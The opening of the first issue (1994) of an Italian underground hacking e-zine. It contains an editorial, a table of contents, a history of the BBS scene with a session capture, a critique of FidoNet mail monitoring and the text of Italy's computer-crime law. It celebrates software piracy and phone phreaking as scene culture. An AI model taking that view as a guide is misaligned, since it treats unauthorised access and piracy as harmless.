The Black Page Numero 0 - Settembre 1994 La prima rivista ITALIANA di H/P/A/V/C/F/C/C HackingPhreakingAnarchyVirusCodezFuckingCellularCyberpunk ======== Redattore Capo, Editore : * Dupree's Paradise

* * Remacoll's Group * Co-Redattore : Ice Mc / DTC Redattori - Collaboratori : Ace Hitman Italy ---------------------------------------------------------------------------The Black Page - Numero 0, Settembre 1994 - ACP:COM Finalmente e' nata, questa dannata rivista ! Ora, due parole sui motivi che ci hanno spinto a creare un simile bollettino telematico. Questa rivista e' destinata ad un pubblico vasto, molto vasto, piu' vasto e' meglio e'. Lo scopo che ci prefiggiamo con questo bollettino piu' o meno periodico e' quello di diffondere un tipo di cultura telematica, quella *CREATIVA*, tra la gente che se ne vuole interessare. Una sorta di contro-corrente informativa in sostanza, diretta a chiunque voglia CAPIRE di piu' su quel mondo fittizio che si trova al di la' delle nostre prese telefoniche. Speriamo che questa rivista telematica venga letta da tutte le persone possibili. Qui i System Administrators potranno apprendere come far fronte ai problemi di sicurezza dei loro sistemi, su come evitare violazioni della suddetta sicurezza, come prevenire intrusioni, come risolvere bug di sistemi, eccetera eccetera, grazie ad articoli ed esempi appositamente pubblicati, in modo che possano effettivamente capire dove eventualmente possano sussistere delle falle nei loro grossi computers. Qui i 'ragazzini intraprendenti' potranno leggere ed imparare cosa vuol dire sicurezza dei sistemi, potranno capire dove stanno i punti deboli dei piu' svariati tipi di computer, potranno imparare a utilizzare questi computer, cosa che potrebbe risultare loro molto utile per un futuro curriculum vitae (Immaginate la differenza di 2 curriculum, uno che riporta "Esperienza di lavoro in ambiente PC-DOS su WordStar 1.0" ed uno che riporta "Vasta conoscenza dei sistemi MSDOS, VAX-VMS, Unix, esperienza di manutenzione dei suddetti sistemi in particolar modo in relazione alla sicurezza informatica" ;) ) quando si presenteranno in qualche ditta in cerca di lavoro. Qui i poliziotti, i finanzieri, e le forze dell'ordine in generale, leggendo questi files, forse potranno capire realmente come stanno le cose in fatto di Pirateria, Accessi non autorizzati, Virus, e forse troveranno anche delle soluzioni ai loro problemi. Qui i Cyberpunk, gli Anarchici, i Diversi, e tutte le persone con una forte apertura mentale in genere potranno trovare articoli fatti per loro, o DA LORO STESSI, se vorranno collaborare inviando materiale. Questa rivista e' totalmente gratis, distribuibile su qualsiasi network. In questa rivista NON VENGONO ASSOLUTAMENTE PUBBLICIZZATI codici di accesso illegali a qualsiasi sistema, ne' carte di credito personali, ne' NIENTE che possa essere direttamente utilizzabile PER SCOPI ILLECITI. Su questa rivista spesso troverete articoli espliciti su svariati generi di cose, dai Virus, alle Droghe, alle Armi, a tutto quello che potete immaginare. Queste informazioni pervengono alla nostra redazione da piu' fonti : Donazioni, Messaggi di posta elettronica, Lettere, Voci, Discussioni con amici o estranei, colloqui con

barboni per la strada, ma anche libri o riviste facilmente reperibili. Se queste cose esistono nella comune stampa, crediamo di essere nel giusto pubblicandole a modo nostro nella nostra rivista gratuita. Quindi per favore, non venite a romperci le palle dicendo che pubblichiamo virus o cazzate del genere. Pubblicheremo inoltre spesso dei trucchi di programmazione che permetteranno di fare svariate cose con un computer, sia esso un Atari PC-Folio o un VAX della Digital. Inoltre daremo voce e spazio a chiunque abbia qualcosa da dire. Per questo sproniamo chiunque voglia contattarci, a farlo al piu' presto possibile. Daremo spazio ad articoli sulla realta' Cyberpunk Italiana, a poesie e composizioni, a pubblicita' gratuite di bbs varie, insomma a quello che vorremo. Date sfogo alla vostra fantasia ! Mandateci materiale ! Qualsiasi cosa che manderete verra' pubblicata SENZA VELI O CENSURE cosi' come viene ricevuta, tranne diversi accordi presi con gli autori. I "crediti" per tali articoli ricadranno esclusivamente sugli autori. In fondo, noi non possiamo far altro che prendere dei file ed incollarli insieme :) Bene, adesso e' ora di iniziare. ============================================================================= ----------------------------------------------------------------The Black Page - Numero 0, Settembre 1994 - Indice generale INDICE DEGLI ARGOMENTI TRATTATI ------------------------------In questo numero si parla di : -----------------------------[1] Un pochino (ma molto poco) di STORIA a cura della Redazione [2] RETI NEL CICLONE a cura di ACE [3] FIDO BUST : Articoli, commenti, stronzate *[4] THE fingerd TROJAN HORSE by Hitman Italy *[5] MINCHIA.MAR, simpatico programmino in Assembler x VAX, scritto alle 5 del mattino by Dupree's Paradise [6] DOVE/COME/QUANDO/PERCHE' FARE TRASHING di Ice MC L'arte di scavare nell'immondizia per cercare cose carine :) [7] L'angolo SIP-TELECOM, Notizie fresche di cassonetto a cura di Ice MC e Dupree's [8] MARIA JUANA : Canapa Indiana, che sollievo da un articolo apparso su "Il Manifesto" a cura della Redazione [9] ARMI E BAGAGLI : Facciamo Casino con poco a cura della Redazione [10] CYBERSPACE - Articolo Mai Pubblicato di Luc Pac (from Decoder BBS) [11] LEONCAVALLO !!! SOLIDARIETA' !!!!!! Le Notizie che allo Stato non conviene far trapelare ... Fonti : ECN, messaggi su Decoder BBS [12] BSA : Un commento letto su Decoder BBS di M F B

*[13] PGP CHAT : Un po' un casino, ma un buon spunto per sentirsi protetti from Decoder BBS [14] LE "NUOVE" TARIFFE ITAKAZ *[15] STRONZATE IN RETE a cura della Redazione * = Articoli tutti o in parte in lingua Inglese. ----------------------------------------------------------------The Black Page - Numero 0, Settembre 1994 - Articolo 1 ====================================== = = = Panoramica sulla scena Telematica = = Underground Italiana ed Europea = = = = by = = * Dupree's Paradise * = = = ====================================== Questo articolo e' stato realizzato in collaborazione con le seguenti brave persone : NESSUNO. Bene, questa e' proprio la parte difficile. Parlare della scena italiana in un momento come questo e' una cosa strana e anche un po' difficile. Certo sono ormai passati i tempi d'oro in cui era abbastanza facile circolare nelle reti, c'era abbondanza di password e di sistemi, che da un anno e mezzo a questa parte pero' cominciano a mancare. Comunque, vogliamo provare a tracciare una panoramica della scena italiana ? Beh, allora direi che ci vuole un po' di "storia" ... iniziando dal passato, dalle prime BBS, i primi gruppi e tutte 'ste cazzate qua. Vi assicuro che e' stato un lavoro da pazzi andare a beccare tutti i diretti interessati e sentire i loro commenti ... almeno accendetemi un cero per onorarmi, oppure se volete recitate pure tutto il PRCD in piedi aull'altare di una chiesa, completamente nudi :)))))))) Come non iniziare parlando del mitico Pier's Group ? Chi di voi lettori non ha mai letto i racconti di Twin Phreacks, farebbe bene a scaricarseli subito, dalla bbs DECODER, 02-29527597, aperta dalle 14 alle 8 del mattino. Li' ci sono proprio tutti ! Scritti dal mitico MF The Best, sono veramente esilaranti. Beh, secondo il mio MODESTISSIMO parere, che sicuramente trovera' molte persone contrarie, il Pier's e' uno dei mitici gruppi che hanno segnato la scena italiana in campo HP, con la loro ormai leggendaria BBS. L'ambiente era veramente strano, particolare, la famosa "Area 7" in cui solo gli Elite potevano entrare era una cosa (per quei tempi) allucinante, in cui si trovavano chicche provenienti dagli USA. Del Pier's abbiamo recuperato giusto qualche capture, di cui vi spariamo qui qualcosa : -------------------------------CAPTURE START-------------------------------atd CONNECT 1200

CPU 68030 ...5 Megabytes RAM Multi-HD System.1x .Space to Resume: Scanning Conference: Guru's Temple.. 9 Conferences Zmodem Protocol: 9600 / 14400 BPS Only A3000 Tower ... BAUDRATES da 300 a 14400 BPS V42bis. 940 MegaBytes Online (Pause)....4 KiloBauds HST V42bis AmiExpress V1. Connect time is Thu May 07 14:28:45 1992 ANSI graphics (Y/n)? N __ _____ __ _____________ / /\ ______ / ___ \ / // ______ ___ \ /_/ / / ____/\ / /__/ // // /___ / /__/ /\ \_\/ / /____\/ / /____// // ____/\/ / __/ / /___ /\ / /\____/ // /____\/ / \ \_\/ _____/ / / /_/ / /_________//_/ / \_\ /______/ / \_\/ \_________\\_\/ \_\ \______\/ _______ _____ __________ __ _____ / _____// ___ \ / ___ _ /\ / // ___ \ / /____ / /__/ /\/ /\_/ // / // // /__/ /\ / //_ // / __/ / / // // / // // /____/ / / /__/ // / \ \_\/ /_// // /_// // /\____\/ /______//_/ / \_________/ \_____//_/ / \______\\_\/ \________\/ \____\\_\/ ____________________ \ E l i t e B B S \____________________/ / /\ S E L E C T E D / \ U S E R S O N L Y / \ /__________\ Sistema Privato per lo Scambio di Files/Messaggi Sede di MILANO (Node0) Aperto 24 ore su 24.1x You are connected to Node 0 at 1200 baud. SysOp and Supreme God Powerful Chat Lord The Immortal CoSysOp The L e a d e r ! : : : : M P E P F T H E I E R N I A C I X I E B E S T Enter your FULL Name: Xxxxxx'x Xxxxxxxx PassWord: ???????? __ / / __ /_/_____ __ ______ _______ ______ \ \ // _____/ / / / ____// ___ / /\ / ____/ \ \ /\ // /___ / / / / / / / / / \/\ / /___ \ \ / \ / \ __/ / / / / / / / / / /\ \\ __/ \ \/ /\ \/ / \ \____\ \____\ \____\ \__\ \ \ \ \/\ \\ \____ \ / \ / \_____\\_____\\_____\\______\ \ \ \_\\_____\ \/ \/ _________________________________\ \ /____________________________________\ A c c e s s o HandShake Software Data Transfer HardWare DATA STORAGE : : : : : R e g o l a r e A u t o r i z z a t o 14..No mail today! (123456789) .CONNECT 1200/NONE Welcome to AmiExpress BBS Version 1.. 365 giorni/anno.No mail today! Scanning Conference: MS-DOS Warez.

.. Sysops' Utilities 9.... The Segret Nest! 8. BEST AMIGA W A R E Z 3. . Auto: 507 Searching for LOSS CARRIER Files! /---------------------------\ PIER'S GROUP BBS \---------------------------/ C: E: G: J: O: S: UR: W: Z: ?: Comment to Sysop Enter Message Goodbye (logoff) Join a conference Operator page.. 4. (Chat) Your statistics Upload resume W(Edit) your stats Zippy search for text This Menu D: F: H: N: R: U: V: X: T: ZOOM: Download files File Listings Display Help New files since a date Read Messages Upload files View a Text file Expert toggle Local Time Zoom Mail (See Help File) M: . LAMERLAND .: Lst Date On: Security Lv: # Times On : Ratio DL/UL: # Downloads: # Uploads : Bytes DL'd : Bytes UL'd : Bytes Avail: XX_X_XXXX 5738 05-03-92 10 6 2/1 1 3 58020 20000000 30000000 Conference 9: MS-DOS Warez Auto-ReJoined Highest Msg: 507 L/Msg.New Users 2. 5.. left): j _____ ***** * * * ___ ***** _____ ***** * * * * * __* ***** _ _ * _ * ** _* * * * * ** * * _____ ***** * _ *** * * _____ ***** * _ *** * ___ ***** _____ ***** * __* ***** * * * * _____ ***** * *** * ___ ***** _ _ * * ** * * * * * ** * * _____ ***** * * * ___ ***** _____ ***** * _ *** * ___ ***** _____ ***** * ___ ***** ____* ***** 1. MS-DOS W A R E Z Conference Number: 7 ..Change ANSI Mode Pier's Group BBS [9:MS-DOS Warez] Menu (27 mins. 6.. Cyberpunks' PHREAKING 7...NOT READY...Conf Access: Caller Num.NOT READY... Read: 0 L/Msg. CONSOLE FILES ONLY ! .

.Case Hydra Ironside/tdt Jettero Heller Josh Longobard Lost found MF THE BEST Madman MarVin SR! Mark Anders NCS POISON Phoenix PiXiE Pier Pitagora RED MUSTANG Remacoll SCSI SEVEN /\/\ SIMONE NASA SUSPIRIA Silver Spring Spider Splatter TIMESCAPE TRON Tom-cat Ugo Belli Vale Baggins Yosh ZEN _/ane ______________________________________________________________________________ (Pause). left): j 8 Joining Conference: Guru's Temple TOP MESSAGE WRITERS Nr: Name: 1 2 3 4 5 6 7 8 9 10 MF THE BEST Jettero Heller The Brain Hydra SHADOWMAN SUSPIRIA FRANCO2 FLASH GORDON Ugo Belli alphabit Group/Location: Twin Phreaks MILANO! --> Five Aces <-Strange Land << CHRONOS >> BOLOGNA ROMA. Read: 490 L/Msg.. tempi in cui si limitava al massimo qualsiasi sputtanamento di info.D.Space to Resume: Highest Msg: 527 L/Msg... tempi in cui ogni upload-download doveva venire approvato . veniva deletato dalla board immediatamente . cosa che invece oggi e' ai massimi livelli.. Auto: 527 Pier's Group BBS [2:AMIGA Warez ] Menu (8 mins. certamente Pier's Msgs: Calls: 2281 1318 876 532 503 306 185 185 179 172 1135 463 274 94 270 542 464 229 45 214 .Creator Dupree's Paradise Eniac FLASH GORDON Federica GORDON GEKKO Genius goblin H. se uno veniva scoperto a boxare per soli 20 km di distanza. Ma comunque.. infatti non funge + un emerito cazzo.ITALY MILANO Milano ( Arese ) Milano Last Update: 05-02-92 11:38:55 -------------------------------END OF CAPTURE------------------------------Bei tempi quelli ! Tempi in cui.Joining Conference: The Secret Nest User who have access to Conf #7 ______________________________________________________________________________ >-hacker-> Andrea Belli Astaroth Axe! Bluelight Burglar Capitan Uncino DEATHBRINGER DIRECT Dr.

L'ATTIVITA' DEL GRUPPO. Ci sono i Brains. Faremmo bene. Oggi la scena e' ricoperta di gruppi piu' o meno vari. Ma comunque. EVENTUALI AZIONI MITICHE COMPIUTE DAL GRUPPO (HACKERAGGI. in cui non si trova piu' niente oltre a giochini del cazzo per Amiga e IBM. LE DATE DELLE FORMAZIONI. PROGRAMMI CREATI. per raccogliere lo spirito di quei tempi andati. INDICANDO IL NOME. o quasi. i Twin Phreacks (ma esistevano realmente?). AGLI INDIRIZZI DI POSTA ELETTRONICA RIPORTATI IN CODA AL FILE.) ED ALTRO. La prossima volta invece di star li a farvi le seghe su Arky mandate del materiale ! Piuttosto se riscontrate delle stronzate mandatemi una mail dove volete. a rivederci qualcuno dei vecchi capture. noi "vecchi". ma non vorrei sparar cazzate. gli INC. Ricordiamo ad esempio gli Omega Team che hanno scritto l'ormai famosa Box per Soundblaster. INVITIAMO PERTANTO TUTTI I GRUPPI ITALIANI E NON CHE VOGLIONO FAR PARTE DELLA NS RECENSIONE STORICA A FARCI PERVENIRE UN MESSAGGIO RELATIVO AL LORO GRUPPO.non era l'unica BBS in Italia ad avere un simile ambiente. IL PGP E' OVVIAMENTE OBBLIGATORIO :) Dupree's Paradise ----------------------------------------------------------------PUBBLICITA' REGRESSO ==================== D E C O D E R B B S CyberNet 65:1200/1 INFORMATION WANT TO BE FREE Orari apertura 14:00 . Non si puo' fare + un cazzo. Ci casino di gruppi vari. ma altre cosi' serie non me ne ricordo. i TDT ed altri. DEMO.08:00 SUPPLEMENTO ELETTRONICO RIVISTA INTERNAZIONALE UNDERGROUND DECODER FidoNet 2:331/369 . Rimandiamo al prossimo numero per un articolo piu' esauriente sulla panoramica italiana. I MEMBRI. Technosubito sono un qui da E comunque oramai i tempi sono cambiati. E se qualche stronzo mi avesse spedito del materiale. c'erano un mare di altri gruppi". di merda. che ora non si sa + che cazzo fanno perche' pare che abbiano anche loro una inculata dal Fidobust. in cui si lavorava con solidarieta'. ma siccome nessuno mi ha aiutato non posso star solo ad enumerarli tutti. non se lo ricorda nessuno. invece di continuare a chiedermi "ma ra rivista quando esce" o "ma se ci scrivo solo io allora niente" adesso non stareste li' a dire "ma questo qui di recensione non ha scritto un cazzo. alla fine della mag ci sono tutti gli indirizzi. ma chi fossero i componenti. e con uno spirito molto diverso da quello. che riempie molte bbs di oggi. gia' dalla schermata del Pier's si evince che c'era qualche gruppo. di cui pregherei chiunque ha info di scrivermi una mail colle memberlist e le attivita'. ECC.

AmigaNet (Amiga Rulez!). alcune sempre generiche ed altre orientate a particolari tematiche come ad esempio le italiane PeaceLink (attivita' sociali. conta ormai nodi in tutti i continenti! A noi questo pero' non interessa poiche' intendiamo occuparci solo della realta' di casa nostra :-) Quasi tutti i net prevedono una policy ("politica") che descrive gerarchia della rete. norme di comportamento. FidoNet e' una rete amatoriale (ovvero gestita per passione e non a scopo di lucro). e' la condanna assoluta della pirateria del software. Se una cosa viene definita illegale chi vuole promuoverla deve evitare di coinvolgere coloro che invece non gradiscono. Settembre 1994 . hobby etc. ma soprattutto per Fido. Iniziamo con una premessa dedicata a chi.a cura della ShaKe Edizioni ----------------------------------------------------------------The Black Page .Reti nel ciclone -------------------a cura di Ace Questo articolo vuole essere l'introduzione ad una serie piu' lunga e complessa che si sviluppera' attraverso i prossimi numeri di TBP (se ci saranno :-). I temi vanno dalle chiacchere generiche alle aree tecniche dedicate a sistemi hardware. non conosce il fenomeno. Premesso che la rete e' composta da molti bravi e volonterosi Sysop attivi con l'unico scopo di divertirsi e diffondere gratuitamente la cultura del dialogo telematico tra le gente. LudoNet (giochi). Chiodo fisso per la maggior parte dei net. Nulla di male comunque. pene per chi le infrange e molto altro. Il problema e' un altro: con la "scusa" di prevenire azioni illecite Fido tende a ridurre a zero la liberta' personale dei singoli utenti. Oggetto delle nostre attenzioni saranno le reti di messaggistica amatoriali come FidoNet (ma non solo).Numero 0. cosa che avveniva anche prima che in Italia esistesse una vera legge in merito (il che e' abbastanza esilarante per la verita'). di bbs che nottetempo si scambiano pacchetti di messaggi seguendo tutta una serie di procedure note come "Fidonet Tecnology" e su cui non ci soffermeremo (se vi interessa procuratevi il file FidoNet. . etc). Il net (alias rete) offre una serie di aree messaggi ove gli utenti possono inserire i propri interventi e leggere quelli degli altri. nata nel 1987 in USA. pacifismo. programmazione. in net si trovano anche elementi con scopi diversi. Sulla scia di FidoNet sono nate nel corso degli anni altre reti. La rete piu' estesa resta comunque Fido che.Articolo 2 -------------------.man). vivendo probabilmente su Marte. lotta alla mafia.

. riguarda infatti la possibilita' di far leggere il proprio messaggio non a tutti ma esclusivamente a destinatario ed. e' assurdo ma andate a vedere chi e' il NOTO ESPERTO INFORMATICO che se l'e' inventato). In questo senso sarebbe molto piu' sicuro per i Sysop stessi non solo evitare la lettura dei messaggi privati ma addirittura farli transitare cryptati via PGP o programma similare che in caso di bisogno consenta di dimostrare (compatibilmente con la conoscenza informatica dei magistrati).La gerarchia di rete consente di raggiungere un limitato (ma pur sempre effettivo) potere decisionale sulle azioni del prossimo e cio' non puo' che attirare chi. in FidoNet (non solo li. se domani il Signor Vertigo.. non di improbabili utilizzi eversivi della matrix! Per la legge italiana ognuno e' responsabile di quel che si trova sul suo hard disk. tanto per fare un nome a caso (e' il RC di Fido per l'Italia). L'utilizzo di programmi come PGP (un crypter talmente potente che neppure la RSA americana e' stata in grado di decifrare i files da esso generati!) comporta l'immediata escluaione del bbs (del bbs. cosa improbabile in quanto un file di testo ha poco valore come prova poiche' facilmente falsificabile. ancora meglio. (lo so. comunque) quest'area non e' privata ma viene letta praticamente dai Sysop di TUTTI i nodi attraverso cui il messaggio transita (perche' transita? Perche' se da MI scrivo ad un utente di NA il msg passa per una serie di BBS intermedie prima di arrivare a destinazione. leggesse il mtx di un tizio che comunica ad un amico il piano per assaltare la sede della BSA. Ogni rete ha (forse e' meglio dire avrebbe). Bene. ma anche per questo vale il consiglio di prima: leggetevi Fidonet.man!). Dunque i Sysop sono tenuti a controllare tutti i messaggi in transito per accertarsi che non contengano informazioni vietate dalla Policy. Secondo le interpretazioni dei Sysop di rete (che valgono quanto quelle della BSA sulla legge 518 relativa alla pirateria del software :-) questa non influisce assolutamente sul Sacro Diritto di leggere le matrix poiche' in policy e' chiaramente spiegato che per Fido il termine "privato" ha un significato abbastanza diverso da quello normale (!).. dove gli utenti possono scambiarsi messaggi che interessano solo mittente e destinatario. Ma paura di cosa? Qui viene il bello: i Signori dovrebbero preoccuparsi di quel che impongono attualmente. impedisca proprio di scoprire il contenuto (eversivo :-) del messaggio. La paura fa 90. Dunque. Perche' questo monitoraggio? Semplice: pericolo di eversione (!!!) o svolgimento di attivita' illegali tramite la rete.. diventerebbe automaticamente complice dei due a meno di non sporgere immediata denuncia. cerca il comando (o la dittatura). Un altro interessante spunto di analisi e' la recente legge 547 sulla telematica che estende la privacy postale ai messaggi elettronici. la forzata estraneita' del Sysop o. oltre alle chiacchere via modem. Fra le tante belle idee di queste persone (che per selezione naturale tendono a conquistare la maggior parte dei ruoli di coordinamento) vi e' l'assoluto annullamento della privacy personale. abitualmente chiamata matrix o NetMail. ai Sysop di tutti i nodi su cui passa (ero stufo di usare 'transita' :-) . non dell'utente!) dalla rete. un'area privata.

i quali. il responsabile della gestione (apertura. FidoNet e' un grande patrimonio collettivo. ma sono solo voci non confermate :-) Note e legenda -------------Fidonet.Nel prossimo numero (se ci sara') riferiro' gli esiti di una piccola ricerca legale che sto svolgendo in merito visto che le dichiarazioni di cui sopra non mi convincono affatto. chiusura. e' invece assoluta per tutte le aree di coordinamento. Pensate solo che un umile CoSysop (che per DEFINIZIONE ha gli stessi poteri del Sysop) per accedervi deve addirittura inviare copia dei suoi dati (reali) a RC e REC. alloggia al 2:333/1. Per contattarlo matrixate a 2:331/301 c/o Vertigo. BSA . pena l'immediata esclusione dalla rete del BBS ed altri provvedimenti. MTX RC REC . Se cio' che ipotizzo verra' confermato saremo di fronte ad una gravissima limitazione della Nostra Liberta' Personale punibile a norma di legge.Regional Coordinator. Se non lo trovate leggetevi la policy Fido che chiarisce ugualmente vari meccanismi di rete. Si batte contro la pirateria del software. . A questo punto pero' tengo a precisare che ne io ne chi mi sta aiutando a svolgere questa inchiesta intendiamo distruggere Fido o far finire nei guai chichessia. La presenza di soggetti parzialmente negativi non deve influire sull'indubbia utilita' della rete.associazione cui aderiscono varie sw houses. Probabilmente vi diranno che anche sognare windows (bhe e' piu' un incubo che altro.. Sogno di riuscire a cambiare certe assurdita' (non solo la privacy negata) ma in caso contrario non mi disperero' di certo anche perche' per i miei msg *privati* ho mezzi ben piu' sicuri .man . vi lascio con una piccola curiosita': la privacy. se possibile. che i Sysop corrono quotidianamente.) piratato e' illegale :-) .e' un testo disponibile in molti BBS ed allegato agli archivi dei principali mailer e tosser (programmi per point e bbs).. assente per i matrix. L'inchiesta che stiamo svolgendo vuole solo chiarire come stanno le cose e capire se in net il rispetto delle leggi comprende solo la 518 o va anche oltre. alcuni citano l'evirazione. In piu' chiunque acceda a tali aree (dove si vocifera circolino segreti di Stato importanti per la stabilita' Democratica della nazione) deve mantenere assoluto riserbo su quanto apprende. Adolfo Melilli. Nei prossimi numeri. senza contare poi i rischi. Io utilizzo regolarmente FidoNet per quel che mi offre. il responsabile italiano per FidoNet. .Regional Echo Coordinator. Il REC in carica. Se volete un'interpretazione obiettiva e aperta della 518 rivolgetevi pure a loro.Vedi matrix... descritti in precedenza.-) Bene. etc) aree echo. ne analizzeremo insieme le parti piu' significative. decideranno se la persona e' gradita o meno. secondo metodi di giudizio personali.

Articolo 3 ------------------------------F I D O B U S T ------------------------------The Fidonet CrackDown by Dupree's (e che cazzo volete ? nessuno mi ha aiutato) E proprio perche' nessuno mi aiuta mi limitero' a postare qui alcuni messaggi catturati qua' e la'.. 1 1. Il Presidente Della Repubblica Promulga la seguente legge: Art.d. Mi rompe i coglioni fare tutto da solo. n. Fanculo il mondo. Settembre 1994 . gia' piu' sicuro) Ci sarebbero altri 10 indirizzi ma penso che questi bastino! Bye! Ace [ N.. La Camera dei Deputati e il Senato della Repubblica hanno approvato.r in relazione alla BSA e al (C) software vi consigliamo di leggere attentamente l'articolo 12 . Saluti e alla prossima! Quasi dimenticavo: se volete contattarmi potete farlo lasciandomi un messaggio nella CPE di Edi BBS (X25 22950135 NRC) oppure via matrix presso: 2:331/368 (FidoNet. alcuni conosciuti. Spero solo di avere piu' collaboratori per il prossimo numero.Numero 0. dopo il secondo comma e' aggiunto il seguente: .. --------------------------------------------------------------------------LEGGE 23 Dicembre 1993.All'articolo 392 del codice penale. Incominciamo col il testo della famigerata e bastardissima "legge" . altri meno.) ] ----------------------------------------------------------------The Black Page .547 Modificazioni ed integrazioni alle norme del codice penale e del codice di procedura penale in tema di criminalita' informatica. Beccatevi sta caterva di bytes.Con questo dovrebbe essere tutto. se volete che il vostro messaggio sia pubblico :-) 65:1200/7 (CyberNet.

violenza sulle cose allorche' un programma informatico viene alterato. delle informazioni o dei programmi ovvero l'interruzione anche parziale del funzionamento dell'impianto o del sistema la pena e' della reclusione da tre a otto anni..Se alcuna delle falsita' previste dal seguente capo riguarda un documento informatico pubblico o privato... Art. modificato o cancellato in tutto o in parte ovvero viene impedito o turbato il funzionamento di un sistema informatico o telematico. ovvero dati.Chiunque commette un fatto diretto a danneggiare o distruggere impianti di pubblica utilita'. 491-bis (Documenti Informatici).. 2 1.Dopo l'articolo 491 del codice penale e' inserito il seguente: Art. La pena e' della reclusione da uno a cinque anni: 1) Se il fatto e' commesso da un pubblico ufficiale o da un incaricato di pubblico servizio. altresi'. 420 (Attentato a impianti di pubblica utilita').Chiunque abusivamente si introduce in un sistema informatico o telematico protetto da misure di sicurezza ovvero vi si mantiene contro la volonta' espressa o tacita di chi ha il diritto di escluderlo. o con abuso della qualita' di operatore di sistema. e' punito. o da chi esercita anche abusivamente la professione di investigatore privato. La pena di cui al primo comma si applica anche a chi commette un fatto diretto a danneggiare o distruggere sistemi informatici o telematici di pubblica utilita'. dei dati.. 2) Se il colpevole per commettere il fatto usa violenza sulle cose o alle persone. si applicano le disposizioni del capo stesso concernenti rispettivamente gli atti pubblici e le scritture private. Art. Qualora informatici pubblico o o comunque i fatti di cui ai commi primo e secondo riguardino sistemi o telematici di interesse militare o relativi all'ordine alla sicurezza pubblica o alla sanita' o alla protezione civile di interesse pubblico. informazioni o programmi in essi contenuti o ad essi pertinenti. e' punto con la reclusione fino a tre anni. 3) Se dal fatto deriva la distruzione o il danneggiamento del sistema o l'interruzione totale o parziale del suo funzionamento. della . 4 1. ovvero se e' palesemente armato. 615-ter (Accesso abusivo ad un sistema informatico o telematico). con la reclusione da uno a quattro anni.L'articolo 420 del codice penale e' sostituito dal seguente: Art. delle informazioni o dei programmi in esso contenuti.. rispettivamente. la pena e'. con abuso dei poteri o con la violazione dei doveri inerenti alla funzione o al servizio.Si ha. Art.Dopo l'articolo 615-bis del codice penale sono inseriti i seguenti: Art. Se dal fatto deriva la distruzione o il danneggiameno dell'impianto o del sistema. A tal fine per documento informatico si intende qualunque supporto informatico contenente dati o informazioni aventi efficacia probatoria o programmi specificatamente destinati ad elaborarli. salvo che il fatto non costituisca piu' grave reato. 3 1. ovvero la distruzione o il danneggiamento dei dati.

totale o parziale. Art. Art. in tutto o in parte. La pena e' della reclusione da uno a due anni e della multa da lire dieci milioni a venti milioni se ricorre taluna delle circostanze di cui ai numeri 1) e 2) del quarto comma dell'articolo 617-quater.. comunica o consegna un programma informatico da lui stesso o da altri redatto.. parole chiavi o altri mezzi idonei all'accesso ad un sistema informatico o telematico. e' punto con la reclusione sino a due anni e con la multa sino a lire venti milioni. dei dati o dei programmi in esso contenuti o ad esso pertinenti. il contenuto delle comunicazioni di cui al primo comma.Chiunque diffonda. 617-quater (Intercettazione. e' punito con la reclusione sino ad un anno e con la multa sino a lire dieci milioni.Nell'articolo 616 del codice penale in quarto comma e' sostituito dal seguente: Agli effetti delle disposizioni di questa sezione. abusivamente si procura. Salvo che il fatto non costituisca pii' grave reato. telefonica... o l'arterazione del suo funzionamento. riproduce. per "corrispondenza" si intende quella epistolare. e' punto con la reclusione da sei mesi a quattro anni.Dopo l'articolo 617-ter del Codice penale sono inseriti i seguenti: Art. la stessa pena si applica a chiunque rivela. al fine di procurare a se o ad altri un profitto o di arrecare ad altri un danno. Art. Tuttavia si procede d'ufficio e la pena e' della reclusione da uno a cinque anni se il fatto e' commesso: 1) in danno a un sistema informatico o telematico utilizzato dallo Stato o da altro ente pubblico o da impresa esercente servizi pubblici o di pubblica necessita'. ovvero con abuso della .Chiunque. comunica o consegna codici. Art. 2) da un pubblico ufficiale o da un incaricato di pubblico servizio. I delitti di cui al primo e secondo comma sono punibili a querela della persona offesa. Nel caso previsto dal primo comma il delitto e' punibile a querela della persona offesa. o comunque fornisce indicazioni o istruzioni idonee al predetto scopo. ovvero le impedisce o le interrompe. diffonde. impedimento o interruzione illecita di comunicazioni informatiche o telematiche). telegrafica. ovvero l'interruzione. con abuso dei poteri o con la violazione dei doveri inerenti alla funzione o al servizio.reclusione da uno a cinque anni e da tre a otto anni. 6 1. negli altri casi si procede d'ufficio.. informatica o telematica ovvero effettuata con ogni altra forma di comunicazione a distanza. 5 1. protetto da misure di sicurezza.Chiunque fraudolentemente intercetta comunicazioni relative ad un sistema informatico o telematico o intercorrenti tra piu' sistemi. mediante qualsiasi mezzo di infoamzione al pubblico. 615-quater (Detenzione e diffuzione abusiva di codici di accesso a sistemi informatici o telematici). 615-quinques (Diffusione di programmi diretti a danneggiare o interrompere un sistema informatico). avente scopo o per effetto in danneggiamento di un sistema informatico o telematico.

alterazione o soppressione del contenuto di comunicazioni informatiche o telematiche). il contenuto.Dopo l'art. inservibili sistemi informatici o telematici altrui. anche occasionalmente intercettato. e' punito.Chiunque.. Art. immagini o altri dati. di taluna delle comunicazioni relative ad un sistema informatico o telematico o intercorrenti tra piu' sistemi.. qualora ne faccia uso o lasci che altri ne facciano uso. con la reclusione da uno a quattro anni. la pena e' della reclusione da uno a quattro anni. ovvero se il fatto e' commesso con abuso della qualita' di operatore di sistema. 9 1. 8 1. impedire o interrompere comunicazioni relative ad un sistema informatico o telematico ovvero intercorrenti tra piu' sistemi. telefoniche. Art. La pena e' della reclusione da uno a cinque anni nei casi previsti dal quarto comme dell'articolo 617-quater. Art.Le disposizioni contenute nella presente sezione. al fine di procurare a se o ad altri un vantaggio o di arrecare ad altri un danno. 635. 635 del codice penale e' inserito il seguente: Art. informazioni o dati altrui. deteriora o rende.Chiunque distrugge. con la reclusione da sei mesi a tre anni. 7 1. 617-sexies (Falsificazione. e' punto con la reclusione da uno a quattro anni.. salvo che il fatto costituisca piu' grave reato. relative alle comunicazioni e conversazioni telegrafiche.. in tutto o in parte.. si applicano a qualunque altra trasmissione a distanza di suoni. Art. 640-bis del cosice penale e' inserito il seguente: .. fuori dai casi consentiti dalla legge.Dopo l'art. installa apparecchiature atte ad intercettare. ovvero programmi. 623-bis (Altre comunicazioni o conversazioni). Art. 617-quinques (Installazione di apparecchiature atte a intercettare. dopo il primo comma e' inserito il seguente: Agli effetti della disposizione di cui al primo comma e' considerato documento anche qualunque supporto informatico contenente dati. forma falsamente ovvero altera o sopprime. la professione di Art. impedire od interrompere comunicazioni informatiche o telematiche)..Chiunque. informatiche o telematiche. La pena e' della reclusione da uno a cinque anni nei casi previsti dal quarto comme dell'articolo 617-quater. e' punito.L'articolo 623-bis del codice penale e' 